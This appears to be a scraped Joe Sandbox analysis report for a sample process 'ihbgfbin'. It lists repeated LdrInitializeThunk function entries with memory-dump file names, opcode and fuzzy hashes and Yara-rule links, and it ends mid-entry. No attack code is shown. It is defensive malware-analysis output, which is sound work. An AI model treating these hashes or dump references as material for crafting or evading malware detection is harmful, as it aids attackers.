                                                                                                                                                                                    control_flow_graph 0 d5f900-d5f918 LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                                                    Function 00D5FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 2 d5fad0-d5fae5 LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                                                    Function 00D5FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 3 d5fae8-d5fafd LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                                                    Function 00D5FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 5 d5fbb8-d5fbcd LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                                                    Function 00D5FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 4 d5fb68-d5fb7d LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                                                    Function 00D5FC90 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 7 d5fc90-d5fca5 LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                                                    Function 00D5FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 6 d5fc60-d5fc75 LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                                                    Function 00D5FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 9 d5fdc0-d5fdd5 LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                                                    Function 00D5FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 8 d5fd8c-d5fda4 LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                                                    Function 00D5FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 11 d5fed0-d5fee5 LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                                                    Function 00D5FEA0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 10 d5fea0-d5feb5 LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                                                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                                                                                                    Function 00D5FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 12 d5ffb4-d5ffc9 LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                                                    Function 0041B0C0 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: h
                                                                                                                                                                                    • API String ID: 0-2439710439
                                                                                                                                                                                    • Opcode ID: 075165b18fd9f3b4bc5acd4a2c9709fb8842792709ea67660a0024d6c808ff27
                                                                                                                                                                                    • Instruction ID: f77eee6e2664df6625b163e4d2198187ea02919632482e59105157d8887227b1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 075165b18fd9f3b4bc5acd4a2c9709fb8842792709ea67660a0024d6c808ff27
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6351E271A00209ABDB24DF65DC81AEFB7B9EF89304F00452EE90597341E738EA4587E9
                                                                                                                                                                                    Function 0041BB60 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
